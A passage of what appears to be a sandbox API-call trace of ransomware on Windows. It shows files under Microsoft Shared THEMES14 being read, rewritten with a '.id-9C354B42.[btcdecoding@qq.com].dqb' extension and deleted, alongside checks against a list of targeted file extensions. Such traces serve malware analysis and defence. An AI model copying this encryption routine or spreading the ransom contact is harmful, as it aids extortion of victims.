dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.208] GetLastError () returned 0x0 [0043.208] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x6b0f, lpOverlapped=0x0) returned 1 [0043.210] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x6b10, lpOverlapped=0x0) returned 1 [0043.211] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.211] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.211] SetEndOfFile (hFile=0x160) returned 1 [0043.211] CloseHandle (hObject=0x160) returned 1 [0043.211] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.212] SetEndOfFile (hFile=0x178) returned 1 [0043.212] CloseHandle (hObject=0x178) returned 1 [0043.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.213] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0043.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.213] lstrlenW (lpString=".doc") returned 4 [0043.213] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.213] lstrlenW (lpString=".docx") returned 5 [0043.213] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.213] lstrlenW (lpString=".pdf") returned 4 [0043.213] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.213] lstrlenW (lpString=".xls") returned 4 [0043.213] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.213] lstrlenW (lpString=".xlsx") returned 5 [0043.213] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.213] lstrlenW (lpString=".ppt") returned 4 [0043.213] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.213] lstrlenW (lpString=".zip") returned 4 [0043.213] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.213] lstrlenW (lpString=".rar") returned 4 [0043.213] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.213] lstrlenW (lpString=".bz2") returned 4 [0043.213] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.213] lstrlenW (lpString=".7z") returned 3 [0043.213] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.213] lstrlenW (lpString=".dbf") returned 4 [0043.213] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".1cd") returned 4 [0043.214] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".jpg") returned 4 [0043.214] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".doc") returned 4 [0043.214] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString=".docx") returned 5 [0043.214] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.214] lstrlenW (lpString=".pdf") returned 4 [0043.214] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString=".xls") returned 4 [0043.214] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.214] lstrlenW (lpString=".xlsx") returned 5 [0043.214] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.214] lstrlenW (lpString=".ppt") returned 4 [0043.214] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".zip") returned 4 [0043.214] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.214] lstrlenW (lpString=".rar") returned 4 [0043.214] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.214] lstrlenW (lpString=".bz2") returned 4 [0043.214] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString=".7z") returned 3 [0043.214] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".dbf") returned 4 [0043.214] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.214] lstrlenW (lpString=".1cd") returned 4 [0043.214] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0043.215] lstrlenW (lpString=".jpg") returned 4 [0043.215] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.215] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.215] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.215] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.215] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=3479) returned 1 [0043.215] CloseHandle (hObject=0x178) returned 1 [0043.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20 [0043.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.215] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.217] GetLastError () returned 0x0 [0043.217] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xd97, lpOverlapped=0x0) returned 1 [0043.218] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0043.219] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.220] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.220] SetEndOfFile (hFile=0x160) returned 1 [0043.220] CloseHandle (hObject=0x160) returned 1 [0043.220] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.220] SetEndOfFile (hFile=0x178) returned 1 [0043.221] CloseHandle (hObject=0x178) returned 1 [0043.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.221] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1 [0043.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.221] lstrlenW (lpString=".doc") returned 4 [0043.221] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.221] lstrlenW (lpString=".docx") returned 5 [0043.221] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.221] lstrlenW (lpString=".pdf") returned 4 [0043.221] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.221] lstrlenW (lpString=".xls") returned 4 [0043.221] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.221] lstrlenW (lpString=".xlsx") returned 5 [0043.221] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.221] lstrlenW (lpString=".ppt") returned 4 [0043.221] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.221] lstrlenW (lpString=".zip") returned 4 [0043.222] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString=".rar") returned 4 [0043.222] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString=".bz2") returned 4 [0043.222] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.222] lstrlenW (lpString=".7z") returned 3 [0043.222] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString=".dbf") returned 4 [0043.222] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString=".1cd") returned 4 [0043.222] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString=".jpg") returned 4 [0043.222] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString=".doc") returned 4 [0043.222] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.222] lstrlenW (lpString=".docx") returned 5 [0043.222] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.222] lstrlenW (lpString=".pdf") returned 4 [0043.222] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString=".xls") returned 4 [0043.222] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString=".xlsx") returned 5 [0043.222] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.222] lstrlenW (lpString=".ppt") returned 4 [0043.222] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.222] lstrlenW (lpString=".zip") returned 4 [0043.222] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.222] lstrlenW (lpString=".rar") returned 4 [0043.222] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.223] lstrlenW (lpString=".bz2") returned 4 [0043.223] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.223] lstrlenW (lpString=".7z") returned 3 [0043.223] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.223] lstrlenW (lpString=".dbf") returned 4 [0043.223] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.223] lstrlenW (lpString=".1cd") returned 4 [0043.223] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0043.223] lstrlenW (lpString=".jpg") returned 4 [0043.223] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.223] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.223] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.223] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=31837) returned 1 [0043.223] CloseHandle (hObject=0x178) returned 1 [0043.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20 [0043.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.224] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.224] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.224] GetLastError () returned 0x0 [0043.224] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x7c5d, lpOverlapped=0x0) returned 1 [0043.422] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x7c60, lpOverlapped=0x0) returned 1 [0043.480] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.480] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.480] SetEndOfFile (hFile=0x160) returned 1 [0043.480] CloseHandle (hObject=0x160) returned 1 [0043.480] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.480] SetEndOfFile (hFile=0x178) returned 1 [0043.481] CloseHandle (hObject=0x178) returned 1 [0043.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.481] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString=".doc") returned 4 [0043.482] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.482] lstrlenW (lpString=".docx") returned 5 [0043.482] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.482] lstrlenW (lpString=".pdf") returned 4 [0043.482] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.482] lstrlenW (lpString=".xls") returned 4 [0043.482] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.482] lstrlenW (lpString=".xlsx") returned 5 [0043.482] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.482] lstrlenW (lpString=".ppt") returned 4 [0043.482] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString=".zip") returned 4 [0043.482] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.482] lstrlenW (lpString=".rar") returned 4 [0043.482] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.482] lstrlenW (lpString=".bz2") returned 4 [0043.482] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.482] lstrlenW (lpString=".7z") returned 3 [0043.482] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString=".dbf") returned 4 [0043.482] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString=".1cd") returned 4 [0043.482] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.482] lstrlenW (lpString=".jpg") returned 4 [0043.483] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString=".doc") returned 4 [0043.483] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString=".docx") returned 5 [0043.483] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.483] lstrlenW (lpString=".pdf") returned 4 [0043.483] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString=".xls") returned 4 [0043.483] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.483] lstrlenW (lpString=".xlsx") returned 5 [0043.483] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.483] lstrlenW (lpString=".ppt") returned 4 [0043.483] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString=".zip") returned 4 [0043.483] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.483] lstrlenW (lpString=".rar") returned 4 [0043.483] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.483] lstrlenW (lpString=".bz2") returned 4 [0043.483] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString=".7z") returned 3 [0043.483] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString=".dbf") returned 4 [0043.483] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString=".1cd") returned 4 [0043.483] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0043.483] lstrlenW (lpString=".jpg") returned 4 [0043.483] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.484] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.484] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.528] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=29925) returned 1 [0043.528] CloseHandle (hObject=0x1a8) returned 1 [0043.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20 [0043.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.528] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.528] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 